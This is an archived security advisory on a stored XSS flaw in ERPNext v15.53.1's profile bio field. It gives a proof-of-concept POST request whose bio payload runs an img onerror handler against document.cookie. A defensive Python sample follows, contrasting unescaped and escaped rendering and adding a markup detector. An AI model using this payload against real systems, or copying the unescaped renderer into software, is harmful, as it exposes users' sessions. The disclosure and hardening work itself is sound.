ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page
ERPNext v15.53.1 has a stored XSS vulnerability: an attacker can inject JavaScript code through the bio field of a user profile, and the malicious script executes when other users view that profile. 2025-6-3 13:3:1 Author: seclists.org


Full Disclosure mailing list archives


From: Ron E <ronaldjedgerson () gmail com>
Date: Fri, 30 May 2025 23:21:17 -0400

An authenticated attacker can inject JavaScript into the bio field of their
user profile. When the profile is viewed by another user, the injected
script executes.

*Proof of Concept:*

POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/2
Host: --host--

profile_info={"bio":"\"><img src=x onerror=alert(document.cookie)>"}
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
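The root cause described above is a stored value being interpolated into profile HTML without output encoding. The following is an added example written for this archive page; it is not code from Ron E's post or from the Frappe/ERPNext project, and the function names, the regex and the renderer markup are hypothetical. It shows the defect (verbatim interpolation) beside the fix (HTML-escaping on output), plus a server-side check a defender could run on the `profile_info` parameter of the update endpoint to flag bios that carry markup. The sample input is constructed from the payload shape in the advisory.

```python
import html
import json
import re

# Constructed sample: the profile_info value from the advisory's PoC,
# as the server would receive it in the request body.
SAMPLE_PROFILE_INFO = '{"bio":"\\"><img src=x onerror=alert(document.cookie)>"}'

# Hypothetical detector: anything that looks like the start of an HTML tag.
# A bare "<" followed by a space or digit ("2 < 3") is deliberately not flagged.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")


def contains_markup(value: str) -> bool:
    """Return True if a bio value contains something that can open an HTML tag."""
    return bool(TAG_RE.search(value))


def render_bio_unsafe(bio: str) -> str:
    """Hypothetical vulnerable renderer: the stored bio is interpolated verbatim,
    so a stored payload becomes live markup when another user views the profile."""
    return f'<div class="bio">{bio}</div>'


def render_bio_safe(bio: str) -> str:
    """Hardened renderer: escape <, >, &, " and ' before interpolation so the
    value is displayed as text and can never become an element or attribute."""
    return f'<div class="bio">{html.escape(bio, quote=True)}</div>'


def check_profile_update(profile_info_json: str) -> dict:
    """Server-side check for the update endpoint's profile_info parameter.

    Returns the parsed bio, whether it was flagged as carrying markup,
    and the escaped HTML that the hardened renderer would emit.
    """
    info = json.loads(profile_info_json)
    bio = info.get("bio", "")
    return {
        "bio": bio,
        "flagged": contains_markup(bio),
        "safe_html": render_bio_safe(bio),
    }


if __name__ == "__main__":
    result = check_profile_update(SAMPLE_PROFILE_INFO)
    print("flagged:", result["flagged"])
    print("unsafe:", render_bio_unsafe(result["bio"]))
    print("safe:  ", result["safe_html"])
```

Escaping on output is the control that actually removes the vulnerability; the markup detector is only a monitoring aid, since a bio that legitimately contains a "<" (for example in a quoted snippet) would be flagged too. A Content-Security-Policy that forbids inline event handlers would limit the impact of the `onerror` handler in the PoC but does not replace output encoding.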



Source: https://seclists.org/fulldisclosure/2025/Jun/11